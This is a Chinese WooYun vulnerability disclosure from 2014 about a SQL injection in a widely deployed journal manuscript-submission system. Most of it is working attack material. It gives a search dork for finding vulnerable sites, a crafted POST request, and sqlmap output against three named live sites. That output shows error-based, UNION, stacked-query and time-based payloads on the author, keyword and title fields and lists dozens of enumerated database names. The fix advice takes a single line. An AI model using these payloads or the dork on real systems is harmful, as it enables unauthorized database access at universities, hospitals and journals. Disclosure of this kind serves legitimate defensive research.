当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076356

漏洞标题:某投稿系统通用型SQL注射漏洞(影响众多企事业单位及学校)

相关厂商:南京杰诺瀚软件科技有限公司

漏洞作者: 路人甲

提交时间:2014-09-18 16:42

修复时间:2014-12-17 16:44

公开时间:2014-12-17 16:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-18: 细节已通知厂商并且等待厂商处理中
2014-09-23: 厂商已经确认,细节仅向厂商公开
2014-09-26: 细节向第三方安全合作伙伴开放
2014-11-17: 细节向核心白帽子及相关领域专家公开
2014-11-27: 细节向普通白帽子公开
2014-12-07: 细节向实习白帽子公开
2014-12-17: 细节向公众公开

简要描述:

没有证明到数据库就不给通过啊~~好吧重新提交下

详细说明:

http://74.125.111.99/search?q=inurl:Web/CommonPage.aspx?Id=
这里搜索到很多。随便找几个测试下:
POST /web/keysearch.aspx HTTP/1.1
Host: www.XXXX.com
User-Agent: Baiduspider
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: cck_lasttime=1410760097025; cck_count=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
author=1&butSearch=%e6%9f%a5%e8%af%a2&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf

漏洞证明:

案例一:湖南大学 http://dxjykx.cnmanu.cn/
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: author
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: author=1%' AND 9293=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105
)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (9293=9293) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='&butSearch=??&ke
yword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: author=1%' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(1
09)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(100)+CHAR(74)+CHAR(79)+CHAR(71)+CHAR(115)+
CHAR(88)+CHAR(77)+CHAR(80)+CHAR(88)+CHAR(82)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(11
7)+CHAR(58), NULL-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state
=&title=wolf
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author=1%'; WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&
Nian=2016&operat=&Qi=1&state=&title=wolf
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author=1%' WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&N
ian=2016&operat=&Qi=1&state=&title=wolf
Place: POST
Parameter: keyword
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: author=1&butSearch=??&keyword=assd%' AND 4223=CONVERT(INT,(SELECT C
HAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (4223=4223) TH
EN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58)))
AND '%'='&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: UNION query
Title: Generic UNION query (78) - 6 columns
Payload: author=1&butSearch=??&keyword=assd%' UNION ALL SELECT 78, 78, 78, 7
8, 78, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(75)+CHAR(90)+CHAR(88
)+CHAR(113)+CHAR(110)+CHAR(103)+CHAR(76)+CHAR(85)+CHAR(80)+CHAR(114)+CHAR(58)+CH
AR(115)+CHAR(97)+CHAR(117)+CHAR(58)-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title=
wolf
Place: POST
Parameter: title
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&stat
e=&title=wolf%' AND 4163=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105)+CHAR(1
12)+CHAR(58)+(SELECT (CASE WHEN (4163=4163) THEN CHAR(49) ELSE CHAR(48) END))+CH
AR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='
Type: UNION query
Title: Generic UNION query (78) - 6 columns
Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&stat
e=&title=wolf%' UNION ALL SELECT 78, 78, 78, 78, CHAR(58)+CHAR(109)+CHAR(105)+CH
AR(112)+CHAR(58)+CHAR(108)+CHAR(97)+CHAR(79)+CHAR(74)+CHAR(71)+CHAR(110)+CHAR(69
)+CHAR(116)+CHAR(108)+CHAR(82)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58), 7
8--
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: author, type: Single quoted string (default)
[1] place: POST, parameter: title, type: Single quoted string
[2] place: POST, parameter: keyword, type: Single quoted string
[q] Quit
>
[13:41:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[13:41:08] [INFO] testing if current user is DBA
current user is DBA: False
[13:41:08] [INFO] fetching database names
[13:41:08] [INFO] the SQL query used returns 59 entries
available databases [59]:
[*] bl
[*] cdxxgc
[*] cg
[*] cghy
[*] cy
[*] cymx
[*] d1
[*] demcom
[*] demo
[*] dj
[*] dxjykx
[*] Eye
[*] gjzhyx
[*] GuaHao
[*] hh
[*] hhzrkx
[*] hlgl
[*] hnxbyx
[*] hxyqdz
[*] j4e
[*] jjyx
[*] lcjsyx
[*] lcjyzzs
[*] lcsjbx
[*] lcsjwk
[*] lnyxybj
[*] main
[*] master
[*] mfskin
[*] model
[*] mrzxwk
[*] msdb
[*] mz
[*] mzyfs
[*] njsd
[*] nky
[*] Northwind
[*] nxgb
[*] nydxxb
[*] pifu
[*] pubs
[*] rfic
[*] SMS
[*] st
[*] sypfb
[*] tempdb
[*] test
[*] wcbx
[*] wf
[*] wlxb
[*] xdx
[*] xhnj
[*] xjyx
[*] xnxyxb
[*] yxjz
[*] zdblx
[*] zjyx
[*] zr
[*] zxyjh
[13:41:08] [INFO] fetched data logged to text files under 'I:\????\SQLMAP~1\Bin\
output\dxjykx.cnmanu.cn'
[*] shutting down at 13:41:08
案例二:上海交通大学医学院附属仁济医院 http://www.cjge-manuscriptcentral.com
D:\Python27\sqlmap>sqlmap.py -r 1.txt --dbs
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 13:25:16
[13:25:16] [INFO] parsing HTTP request from '1.txt'
[13:25:16] [INFO] using 'D:\Python27\sqlmap\output\www.cjge-manuscriptcentral.co
m\session' as session file
[13:25:16] [INFO] resuming injection data from session file
[13:25:16] [INFO] resuming back-end DBMS 'microsoft sql server 2000' from sessio
n file
[13:25:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: author
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author=1'; WAITFOR DELAY '0:0:5';-- AND 'enfS'='enfS&butSearch=查询
&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=Mr.
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author=1' WAITFOR DELAY '0:0:5'-- AND 'ExWQ'='ExWQ&butSearch=查询&k
eyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=Mr.
---
[13:25:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[13:25:17] [INFO] fetching database names
[13:25:17] [INFO] fetching number of databases
[13:25:17] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
59
[13:25:47] [INFO] retrieved:
[13:25:52] [WARNING] adjusting time delay to 1 second
bl
[13:26:33] [INFO] retrieved: cdxxgc
[13:27:12] [INFO] retrieved: cg
[13:27:25] [INFO] retrieved: cghy
[13:27:51] [INFO] retrieved: cy
[13:28:03] [INFO] retrieved: cymx
[13:28:30] [INFO] retrieved: d1
[13:28:42] [INFO] retrieved: demcom
[13:29:18] [INFO] retrieved: demo
[13:29:44] [INFO] retrieved: dj
[13:29:58] [INFO] retrieved: dxjykx
[13:30:39] [INFO] retrieved: Eye
[13:30:56] [INFO] retrieved: gjzhyx
[13:31:38] [INFO] retrieved: GuaHao
[13:32:13] [INFO] retrieved: hh
[13:32:30] [INFO] retrieved: hhzrkx
[13:33:13] [INFO] retrieved: hlgl
[13:33:43] [INFO] retrieved: hnxbyx
[13:34:26] [INFO] retrieved: hxyqdz
[13:35:07] [INFO] retrieved: j4e
[13:35:27] [INFO] retrieved: jjyx
[13:35:55] [INFO] retrieved: lcjsyx
[13:36:35] [INFO] retrieved: lcjyzzs
[13:37:23] [INFO] retrieved: lcsjbx
没有检测完,就证明下漏洞能够获取到数据库信息即可了吧!
案例三:中国美容整形外科杂志 mr.cnmanu.cn
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: title
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&stat
e=&title=wolf%' AND 7683=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119)+CHAR(1
14)+CHAR(58)+(SELECT (CASE WHEN (7683=7683) THEN CHAR(49) ELSE CHAR(48) END))+CH
AR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='
Type: UNION query
Title: Generic UNION query (41) - 6 columns
Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&stat
e=&title=wolf%' UNION ALL SELECT 41, 41, 41, 41, CHAR(58)+CHAR(104)+CHAR(119)+CH
AR(114)+CHAR(58)+CHAR(76)+CHAR(69)+CHAR(116)+CHAR(66)+CHAR(113)+CHAR(78)+CHAR(71
)+CHAR(76)+CHAR(75)+CHAR(98)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58), 41
--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&stat
e=&title=wolf%'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&stat
e=&title=wolf%' WAITFOR DELAY '0:0:5'--
Place: POST
Parameter: keyword
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: author=1&butSearch=??&keyword=assd%' AND 2981=CONVERT(INT,(SELECT C
HAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (2981=2981) TH
EN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))
) AND '%'='&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: UNION query
Title: Generic UNION query (41) - 6 columns
Payload: author=1&butSearch=??&keyword=assd%' UNION ALL SELECT 41, 41, 41, 4
1, 41, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(122)+CHAR(72)+CHAR(1
05)+CHAR(70)+CHAR(111)+CHAR(73)+CHAR(83)+CHAR(98)+CHAR(117)+CHAR(100)+CHAR(58)+C
HAR(110)+CHAR(119)+CHAR(116)+CHAR(58)-- &Lm=2&Nian=2016&operat=&Qi=1&state=&titl
e=wolf
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author=1&butSearch=??&keyword=assd%'; WAITFOR DELAY '0:0:5'--&Lm=2&
Nian=2016&operat=&Qi=1&state=&title=wolf
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author=1&butSearch=??&keyword=assd%' WAITFOR DELAY '0:0:5'--&Lm=2&N
ian=2016&operat=&Qi=1&state=&title=wolf
Place: POST
Parameter: author
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: author=1%' AND 6529=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119
)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (6529=6529) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='&butSearch=??&k
eyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: author=1%' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CHAR(58)+
CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(119)+CHAR(119)+CHAR(101)+CHAR(76)+CH
AR(87)+CHAR(114)+CHAR(81)+CHAR(75)+CHAR(70)+CHAR(71)+CHAR(58)+CHAR(110)+CHAR(119
)+CHAR(116)+CHAR(58)-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&st
ate=&title=wolf
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author=1%'; WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&
Nian=2016&operat=&Qi=1&state=&title=wolf
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author=1%' WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&N
ian=2016&operat=&Qi=1&state=&title=wolf
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: author, type: Single quoted string (default)
[1] place: POST, parameter: title, type: Single quoted string
[2] place: POST, parameter: keyword, type: Single quoted string
[q] Quit
>
[13:40:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[13:40:55] [INFO] testing if current user is DBA
current user is DBA: False
[13:40:55] [INFO] fetching database names
[13:40:55] [INFO] the SQL query used returns 59 entries
available databases [59]:
[*] bl
[*] cdxxgc
[*] cg
[*] cghy
[*] cy
[*] cymx
[*] d1
[*] demcom
[*] demo
[*] dj
[*] dxjykx
[*] Eye
[*] gjzhyx
[*] GuaHao
[*] hh
[*] hhzrkx
[*] hlgl
[*] hnxbyx
[*] hxyqdz
[*] j4e
[*] jjyx
[*] lcjsyx
[*] lcjyzzs
[*] lcsjbx
[*] lcsjwk
[*] lnyxybj
[*] main
[*] master
[*] mfskin
[*] model
[*] mrzxwk
[*] msdb
[*] mz
[*] mzyfs
[*] njsd
[*] nky
[*] Northwind
[*] nxgb
[*] nydxxb
[*] pifu
[*] pubs
[*] rfic
[*] SMS
[*] st
[*] sypfb
[*] tempdb
[*] test
[*] wcbx
[*] wf
[*] wlxb
[*] xdx
[*] xhnj
[*] xjyx
[*] xnxyxb
[*] yxjz
[*] zdblx
[*] zjyx
[*] zr
[*] zxyjh
[13:40:55] [INFO] fetched data logged to text files under 'I:\????\SQLMAP~1\Bin\
output\mr.cnmanu.cn'
[*] shutting down at 13:40:55
审核的大牛这样可以了吧~~~

修复方案:

漏洞修复相对就比较简单了,多POST全局过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-09-23 08:40

厂商回复:

最新状态:

暂无